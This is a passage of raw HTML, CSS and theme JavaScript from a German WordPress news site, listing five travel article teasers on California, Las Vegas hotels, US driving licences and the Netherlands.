.td-icon-star,.tdi_94 .td-icon-star-empty,.tdi_94 .td-icon-star-half{font-size:15px}.tdi_94 .td-module-comments{display:none}.tdi_94 .td_module_wrap:nth-last-child(1){margin-bottom:0;padding-bottom:0}.tdi_94 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none}.tdi_94 .td-post-category:hover{background-color:rgba(255,255,255,0)!important;color:#000000}.tdi_94 .td-module-title a{color:#000000;box-shadow:inset 0 0 0 0 #000}.tdi_94 .td_module_wrap:hover .td-module-title a{color:#f43f3f!important}.tdi_94 .td-post-date,.tdi_94 .td-post-author-name span{color:#000000}.tdi_94.td_with_ajax_pagination .td-next-prev-wrap a,.tdi_94 .td-load-more-wrap a{color:#000000;background-color:rgba(255,255,255,0);border-width:0px}.tdi_94 .td-load-more-wrap a .td-load-more-icon-svg svg,.tdi_94 .td-load-more-wrap a .td-load-more-icon-svg svg *,.tdi_94.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg,.tdi_94.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg *{fill:#000000}.tdi_94.td_with_ajax_pagination .td-next-prev-wrap a:hover,.tdi_94 .td-load-more-wrap a:hover{color:#ec3535;background-color:rgba(255,255,255,0)!important;border-color:rgba(255,255,255,0)!important}.tdi_94 .td-load-more-wrap a:hover .td-load-more-icon-svg svg,.tdi_94 .td-load-more-wrap a:hover .td-load-more-icon-svg svg *,.tdi_94.td_with_ajax_pagination .td-next-prev-wrap a:hover .td-next-prev-icon-svg svg,.tdi_94.td_with_ajax_pagination .td-next-prev-wrap a:hover .td-next-prev-icon-svg svg *{fill:#ec3535}.tdi_94 .td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 5px 0 0;padding:3px 5px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_94 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_94 .entry-title{margin:0 0 10px;font-family:PT Serif!important;font-size:14px!important;line-height:1.4!important;font-weight:600!important}.tdi_94.td_with_ajax_pagination .td-next-prev-wrap,.tdi_94 .td-load-more-wrap{margin-top:15px}.tdi_94.td_with_ajax_pagination .td-next-prev-wrap a,.tdi_94 .td-load-more-wrap a i{font-size:22px}.tdi_94 .td-load-more-wrap a .td-load-more-icon-svg svg,.tdi_94.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg{width:22px;height:calc(22px + 1px)}.tdi_94 .td-editor-date,.tdi_94 .td-editor-date .td-post-author-name a,.tdi_94 .td-editor-date .entry-date,.tdi_94 .td-module-comments a{font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;letter-spacing:-0.5px!important}html:not([class*='ie']) .tdi_94 .td-module-container:hover .entry-thumb:before{opacity:0}@media (min-width:768px){.tdi_94 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_94 .td-image-container{display:none}.tdi_94 .td_module_wrap{padding-bottom:3px;margin-bottom:3px;padding-bottom:3px!important;margin-bottom:3px!important}.tdi_94 .td-module-container:before{bottom:-3px}.tdi_94 .td-module-container{padding:0 0 10px}.tdi_94 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_94 .td_module_wrap .td-module-container:before{display:block!important}.tdi_94 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_94 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_94 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_94 .entry-title{margin:0 0 6px;font-size:13px!important;line-height:1.3!important}.tdi_94.td_with_ajax_pagination .td-next-prev-wrap,.tdi_94 .td-load-more-wrap{margin-top:10px}.tdi_94.td_with_ajax_pagination .td-next-prev-wrap a,.tdi_94 .td-load-more-wrap a i{font-size:20px}.tdi_94 .td-load-more-wrap a .td-load-more-icon-svg svg,.tdi_94.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg{width:20px;height:calc(20px + 1px)}.tdi_94 .td-post-category{font-size:11px!important}.tdi_94 .td-editor-date,.tdi_94 .td-editor-date .td-post-author-name a,.tdi_94 .td-editor-date .entry-date,.tdi_94 .td-module-comments a{font-size:11px!important}@media (min-width:768px){.tdi_94 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_94 .td-image-container{display:none}.tdi_94 .td_module_wrap{padding-bottom:2.5px;margin-bottom:2.5px;padding-bottom:2.5px!important;margin-bottom:2.5px!important}.tdi_94 .td-module-container:before{bottom:-2.5px}.tdi_94 .td-module-container{padding:0 0 8px}.tdi_94 .td-post-category{margin:0px;padding:0px}.tdi_94 .td-post-category:not(.td-post-extra-category){display:none}.tdi_94 .td-author-date{display:none}.tdi_94 .td-post-date,.tdi_94 .td-post-author-name span{display:none}.tdi_94 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_94 .td_module_wrap .td-module-container:before{display:block!important}.tdi_94 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_94 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_94 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_94 .entry-title{margin:0px;font-size:12px!important}.tdi_94.td_with_ajax_pagination .td-next-prev-wrap,.tdi_94 .td-load-more-wrap{margin-top:5px}.tdi_94.td_with_ajax_pagination .td-next-prev-wrap a,.tdi_94 .td-load-more-wrap a i{font-size:18px}.tdi_94 .td-load-more-wrap a .td-load-more-icon-svg svg,.tdi_94.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg{width:18px;height:calc(18px + 1px)}.tdi_94 .td-editor-date,.tdi_94 .td-editor-date .td-post-author-name a,.tdi_94 .td-editor-date .entry-date,.tdi_94 .td-module-comments a{font-size:10px!important}@media (min-width:768px){.tdi_94 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_94 .td-image-wrap{padding-bottom:110%}.tdi_94 .td-image-container{flex:0 0 30%;width:30%;display:none}.ie10 .tdi_94 .td-image-container,.ie11 .tdi_94 .td-image-container{flex:0 0 auto}.tdi_94 .td_module_wrap{padding-bottom:6px;margin-bottom:6px;padding-bottom:6px!important;margin-bottom:6px!important}.tdi_94 .td-module-container:before{bottom:-6px}.tdi_94 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_94 .td_module_wrap .td-module-container:before{display:block!important}.tdi_94 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_94 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_94 .td-module-exclusive .td-module-title a:before{font-size:11px!important}@media (min-width:768px){.tdi_94 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_94 = new tdBlock();
  877. block_tdi_94.id = "tdi_94";
  878. block_tdi_94.atts = '{"modules_on_row":"","image_size":"","image_floated":"hidden","image_width":"eyJwaG9uZSI6IjMwIn0=","image_height":"eyJwaG9uZSI6IjExMCJ9","show_btn":"none","show_excerpt":"eyJwaG9uZSI6Im5vbmUiLCJhbGwiOiJub25lIn0=","show_com":"eyJwaG9uZSI6Im5vbmUiLCJhbGwiOiJub25lIn0=","show_author":"none","show_cat":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","meta_padding":"0","f_title_font_size":"eyJhbGwiOiIxNCIsInBvcnRyYWl0IjoiMTIiLCJsYW5kc2NhcGUiOiIxMyJ9","f_title_font_line_height":"eyJhbGwiOiIxLjQiLCJsYW5kc2NhcGUiOiIxLjMifQ==","f_title_font_weight":"600","all_modules_space":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjYiLCJwb3J0cmFpdCI6IjUifQ==","category_id":"","show_date":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","art_excerpt":"0","show_review":"none","tdc_css":"eyJhbGwiOnsibWFyZ2luLXRvcCI6IjIwIiwibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn0sInBvcnRyYWl0Ijp7Im1hcmdpbi10b3AiOiItNSIsImRpc3BsYXkiOiIifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OCwicGhvbmUiOnsiZGlzcGxheSI6IiJ9LCJwaG9uZV9tYXhfd2lkdGgiOjc2NywibGFuZHNjYXBlIjp7Im1hcmdpbi10b3AiOiI1IiwiZGlzcGxheSI6IiJ9LCJsYW5kc2NhcGVfbWF4X3dpZHRoIjoxMTQwLCJsYW5kc2NhcGVfbWluX3dpZHRoIjoxMDE5fQ==","f_title_font_family":"456","mc1_el":"10","title_txt_hover":"#f43f3f","title_txt":"#000000","art_title":"eyJhbGwiOiIwIDAgMTBweCIsInBvcnRyYWl0IjoiMCIsImxhbmRzY2FwZSI6IjAgMCA2cHgifQ==","modules_border_size":"0 0 1px 0","m_padding":"eyJhbGwiOiIwIDAgMTVweCIsImxhbmRzY2FwZSI6IjAgMCAxMHB4IiwicG9ydHJhaXQiOiIwIDAgOHB4In0=","modules_gap":"0","f_meta_font_size":"eyJhbGwiOiIxMiIsInBvcnRyYWl0IjoiMTAiLCJsYW5kc2NhcGUiOiIxMSJ9","f_meta_font_line_height":"1","f_meta_font_weight":"500","f_meta_font_family":"653","modules_cat_border":"0","modules_category_padding":"eyJhbGwiOiIycHggMCIsInBvcnRyYWl0IjoiMCJ9","f_cat_font_family":"653","f_cat_font_transform":"uppercase","f_cat_font_size":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjExIn0=","f_cat_font_weight":"600","f_cat_font_line_height":"1","f_meta_font_spacing":"-0.5","f_cat_font_spacing":"-0.5","cat_bg":"rgba(255,255,255,0)","cat_bg_hover":"rgba(255,255,255,0)","cat_txt":"#ec3535","cat_txt_hover":"#000000","modules_category_margin":"eyJhbGwiOiIwIDVweCAwIDAiLCJwb3J0cmFpdCI6IjAifQ==","ajax_pagination":"next_prev","pag_border_width":"0","pag_space":"eyJhbGwiOiIxNSIsImxhbmRzY2FwZSI6IjEwIiwicG9ydHJhaXQiOiI1In0=","prev_tdicon":"tdc-font-tdmp tdc-font-tdmp-arrow-left","next_tdicon":"tdc-font-tdmp tdc-font-tdmp-arrow-right","pag_icons_size":"eyJhbGwiOiIyMiIsImxhbmRzY2FwZSI6IjIwIiwicG9ydHJhaXQiOiIxOCJ9","pag_text":"#000000","pag_h_text":"#ec3535","pag_bg":"rgba(255,255,255,0)","pag_h_bg":"rgba(255,255,255,0)","f_excl_font_family":"653","f_excl_font_transform":"uppercase","f_excl_font_size":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjExIiwicG9ydHJhaXQiOiIxMSIsInBob25lIjoiMTEifQ==","f_excl_font_weight":"500","f_excl_font_line_height":"1","f_excl_font_spacing":"-0.5","excl_padd":"3px 5px","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_bg":"#ec3535","excl_bg_h":"#ec3535","excl_radius":"2","excl_margin":"-4px 5px 0 0","excl_show":"","offset":"4","date_txt":"#000000","block_type":"td_flex_block_1","separator":"","custom_title":"","custom_url":"","block_template_id":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","post_ids":"","taxonomies":"","category_ids":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","sort":"","linked_posts":"","favourite_only":"","locked_only":"","limit":"5","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","td_ajax_preloading":"","container_width":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_border_radius":"","modules_divider":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_radius":"","hide_image":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_txt":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_":"","meta_info_align":"","meta_info_horiz":"layout-default","meta_width":"","meta_margin":"","meta_space":"","art_btn":"","meta_info_border_size":"","meta_info_border_style":"","meta_info_border_color":"#eaeaea","meta_info_border_radius":"","modules_category":"","modules_category_radius":"0","modules_extra_cat":"","author_photo":"","author_photo_size":"","author_photo_space":"","author_photo_radius":"","review_space":"","review_size":"2.5","review_distance":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","excerpt_inline":"","show_audio":"block","hide_audio":"","art_audio":"","art_audio_size":"1.5","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","pag_padding":"","pag_border_radius":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_transform":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_style":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_style":"","f_meta_font_transform":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_weight":"","f_btn_font_transform":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","m_bg":"","color_overlay":"","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","all_underline_height":"","all_underline_color":"","cat_border":"","cat_border_hover":"","meta_bg":"","author_txt":"","author_txt_hover":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","shadow_m_shadow_header":"","shadow_m_shadow_title":"Meta info shadow","shadow_m_shadow_size":"","shadow_m_shadow_offset_horizontal":"","shadow_m_shadow_offset_vertical":"","shadow_m_shadow_spread":"","shadow_m_shadow_color":"","btn_bg":"","btn_bg_hover":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","pag_border":"","pag_h_border":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":1,"header_color":"","color_preset":"","border_top":"","class":"tdi_94","tdc_css_class":"tdi_94","tdc_css_class_style":"tdi_94_rand_style"}';
  879. block_tdi_94.td_column_number = "1";
  880. block_tdi_94.block_type = "td_flex_block_1";
  881. block_tdi_94.post_count = "5";
  882. block_tdi_94.found_posts = "3784";
  883. block_tdi_94.header_color = "";
  884. block_tdi_94.ajax_pagination_infinite_stop = "";
  885. block_tdi_94.max_num_pages = "756";
  886. tdBlocksArray.push(block_tdi_94);
  887. </script><div class="td-block-title-wrap"></div><div id=tdi_94 class="td_block_inner td-mc1-wrap">
  888.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  889.            <div class="td-module-container td-category-pos-">
  890.                                    <div class="td-image-container">
  891.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/sehenswuerdigkeiten-in-kalifornien/" rel="bookmark" class="td-image-wrap " title="Die schönsten Sehenswürdigkeiten in Kalifornien: Ein unvergessliches Abenteuer"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-7-1-696x391.jpg"  ></span></a></div>                                                                    </div>
  892.                
  893.                <div class="td-module-meta-info">
  894.                                        
  895.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/sehenswuerdigkeiten-in-kalifornien/" rel="bookmark" title="Die schönsten Sehenswürdigkeiten in Kalifornien: Ein unvergessliches Abenteuer">Die schönsten Sehenswürdigkeiten in Kalifornien: Ein unvergessliches Abenteuer</a></h3>
  896.                    
  897.                                            <div class="td-editor-date">
  898.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  899.                                                            <span class="td-author-date">
  900.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T08:51:38+02:00" >Mai 2, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/sehenswuerdigkeiten-in-kalifornien/#respond">0</a></span>                                </span>
  901.                                                    </div>
  902.                    
  903.                    <div class="td-excerpt">Kalifornien, der Sonnenstaat der USA, ist ein Mekka für...</div>
  904.                    
  905.                                    </div>
  906.            </div>
  907.        </div>
  908.  
  909.        
  910.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  911.            <div class="td-module-container td-category-pos-">
  912.                                    <div class="td-image-container">
  913.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/hotels-in-las-vegas/" rel="bookmark" class="td-image-wrap " title="Die besten Hotels in Las Vegas: Eine umfassende Anleitung"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-8-1-696x391.jpg"  ></span></a></div>                                                                    </div>
  914.                
  915.                <div class="td-module-meta-info">
  916.                                        
  917.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/hotels-in-las-vegas/" rel="bookmark" title="Die besten Hotels in Las Vegas: Eine umfassende Anleitung">Die besten Hotels in Las Vegas: Eine umfassende Anleitung</a></h3>
  918.                    
  919.                                            <div class="td-editor-date">
  920.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  921.                                                            <span class="td-author-date">
  922.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T07:52:08+02:00" >Mai 2, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/hotels-in-las-vegas/#respond">0</a></span>                                </span>
  923.                                                    </div>
  924.                    
  925.                    <div class="td-excerpt">Las Vegas, bekannt für seine glitzernden Lichter, erstklassigen Unterhaltungsmöglichkeiten...</div>
  926.                    
  927.                                    </div>
  928.            </div>
  929.        </div>
  930.  
  931.        
  932.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  933.            <div class="td-module-container td-category-pos-">
  934.                                    <div class="td-image-container">
  935.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/internationale-fuehrerschein-fuer-die-usa/" rel="bookmark" class="td-image-wrap " title="Der internationale Führerschein für die USA: Ein unverzichtbares Dokument für deutsche Autofahrer"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-9-1-696x391.jpg"  ></span></a></div>                                                                    </div>
  936.                
  937.                <div class="td-module-meta-info">
  938.                                        
  939.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/internationale-fuehrerschein-fuer-die-usa/" rel="bookmark" title="Der internationale Führerschein für die USA: Ein unverzichtbares Dokument für deutsche Autofahrer">Der internationale Führerschein für die USA: Ein unverzichtbares Dokument für deutsche Autofahrer</a></h3>
  940.                    
  941.                                            <div class="td-editor-date">
  942.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  943.                                                            <span class="td-author-date">
  944.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-01T11:43:48+02:00" >Mai 1, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/internationale-fuehrerschein-fuer-die-usa/#respond">0</a></span>                                </span>
  945.                                                    </div>
  946.                    
  947.                    <div class="td-excerpt">Wenn Sie planen, in den Vereinigten Staaten zu fahren,...</div>
  948.                    
  949.                                    </div>
  950.            </div>
  951.        </div>
  952.  
  953.        
  954.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  955.            <div class="td-module-container td-category-pos-">
  956.                                    <div class="td-image-container">
  957.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/koenigstag-in-den-niederlanden/" rel="bookmark" class="td-image-wrap " title="Königstag in den Niederlanden: Ein lebendiges Fest in Orange"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-15-696x391.jpg"  ></span></a></div>                                                                    </div>
  958.                
  959.                <div class="td-module-meta-info">
  960.                                        
  961.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/koenigstag-in-den-niederlanden/" rel="bookmark" title="Königstag in den Niederlanden: Ein lebendiges Fest in Orange">Königstag in den Niederlanden: Ein lebendiges Fest in Orange</a></h3>
  962.                    
  963.                                            <div class="td-editor-date">
  964.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  965.                                                            <span class="td-author-date">
  966.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-01T10:43:47+02:00" >Mai 1, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/koenigstag-in-den-niederlanden/#respond">0</a></span>                                </span>
  967.                                                    </div>
  968.                    
  969.                    <div class="td-excerpt">Jedes Jahr verwandelt sich die Niederlande in ein Meer...</div>
  970.                    
  971.                                    </div>
  972.            </div>
  973.        </div>
  974.  
  975.        
  976.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  977.            <div class="td-module-container td-category-pos-">
  978.                                    <div class="td-image-container">
  979.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/ein-umfassender-leitfaden-zur-maskenpflicht-und-corona-regeln-fuer-reisende-in-die-niederlande/" rel="bookmark" class="td-image-wrap " title="Ein umfassender Leitfaden zur Maskenpflicht und Corona-Regeln für Reisende in die Niederlande"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-16-696x391.jpg"  ></span></a></div>                                                                    </div>
  980.                
  981.                <div class="td-module-meta-info">
  982.                                        
  983.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/ein-umfassender-leitfaden-zur-maskenpflicht-und-corona-regeln-fuer-reisende-in-die-niederlande/" rel="bookmark" title="Ein umfassender Leitfaden zur Maskenpflicht und Corona-Regeln für Reisende in die Niederlande">Ein umfassender Leitfaden zur Maskenpflicht und Corona-Regeln für Reisende in die Niederlande</a></h3>
  984.                    
  985.                                            <div class="td-editor-date">
  986.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  987.                                                            <span class="td-author-date">
  988.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-01T09:43:46+02:00" >Mai 1, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/ein-umfassender-leitfaden-zur-maskenpflicht-und-corona-regeln-fuer-reisende-in-die-niederlande/#respond">0</a></span>                                </span>
  989.                                                    </div>
  990.                    
  991.                    <div class="td-excerpt">Die Niederlande, mit Amsterdam als strahlendem Juwel, stehen bei...</div>
  992.                    
  993.                                    </div>
  994.            </div>
  995.        </div>
  996.  
  997.        </div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" aria-label="prev-page" id="prev-page-tdi_94" data-td_block_id="tdi_94"><i class="td-next-prev-icon tdc-font-tdmp tdc-font-tdmp-arrow-left"></i></a><a href="#"  class="td-ajax-next-page" aria-label="next-page" id="next-page-tdi_94" data-td_block_id="tdi_94"><i class="td-next-prev-icon tdc-font-tdmp tdc-font-tdmp-arrow-right"></i></a></div></div></div></div><div class="vc_column tdi_96  wpb_column vc_column_container tdc-column td-pb-span3">
  998. <style scoped>.tdi_96{vertical-align:baseline}.tdi_96>.wpb_wrapper,.tdi_96>.wpb_wrapper>.tdc-elements{display:block}.tdi_96>.wpb_wrapper>.tdc-elements{width:100%}.tdi_96>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_96>.wpb_wrapper{width:auto;height:auto}.tdi_96{width:40%!important}@media (max-width:767px){.tdi_96{margin-bottom:30px!important;width:100%!important}}</style><div class="wpb_wrapper" ><div class="td_block_wrap td_flex_block_2 tdi_97 td-flb-margin-left td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_97" >
  999. <style>.tdi_97{margin-bottom:0px!important}</style>
  1000. <style>.tdi_97 .td-module-thumb{height:600px}.tdi_97 .td-module-thumb{margin-left:-0px}.tdi_97 .td_module_wrap{margin-bottom:0px}.tdi_97 .td_module_wrap:last-child{margin-bottom:0}.tdi_97.td_with_ajax_pagination .td-next-prev-wrap{align-items:flex-start;justify-content:flex-end;padding:20px 20px 0 0}.tdi_97 .entry-thumb{background-position:center 50%}body .tdi_97 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_97 .td-video-play-ico{top:50%;left:50%;transform:translate(-50%,-50%)}.tdi_97 .td-post-vid-time{display:inline-block}.tdi_97 .td-post-category{padding:5px 8px;border-radius:2px;font-family:Work Sans!important;font-size:13px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important;background-color:#ec3535;color:#ffffff}.tdi_97 .td-module-meta-info{top:auto;bottom:0;padding:0 25px 25px}.tdi_97 .entry-title{margin:16px 0 12px 0;font-family:Work Sans!important;font-size:40px!important;line-height:1!important;font-weight:700!important}.tdi_97 .td-excerpt{margin:0px;font-family:Work Sans!important;font-size:16px!important;line-height:1.4!important;font-weight:500!important;color:#ffffff}.tdi_97 .td-author-date{display:inline}.tdi_97 .td-post-author-name{display:none}.tdi_97 .td-post-date,.tdi_97 .td-post-author-name span{display:none}.tdi_97 .entry-review-stars{display:inline-block}.tdi_97 .td-icon-star,.tdi_97 .td-icon-star-empty,.tdi_97 .td-icon-star-half{font-size:15px}.tdi_97 .td-module-comments{display:none}.tdi_97 .td-read-more{display:none}.tdi_97 .td-module-exclusive .td-module-title a:before{display:inline-block;padding:5px 8px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:13px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important}.tdi_97 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_97 .td-read-more a{text-transform:uppercase!important;background-color:rgba(255,255,255,0)!important}.tdi_97 .td-module-thumb a:after{content:'';position:absolute;top:0;left:0;width:100%;height:100%;background:-webkit-linear-gradient(0deg,rgba(0,0,0,0.8),rgba(0,0,0,0.5) 42%,rgba(0,0,0,0) 61%,rgba(0,0,0,0));background:linear-gradient(0deg,rgba(0,0,0,0.8),rgba(0,0,0,0.5) 42%,rgba(0,0,0,0) 61%,rgba(0,0,0,0))}.tdi_97 .td-post-category:hover{background-color:#000000;color:#ffffff}.tdi_97 .td-module-title 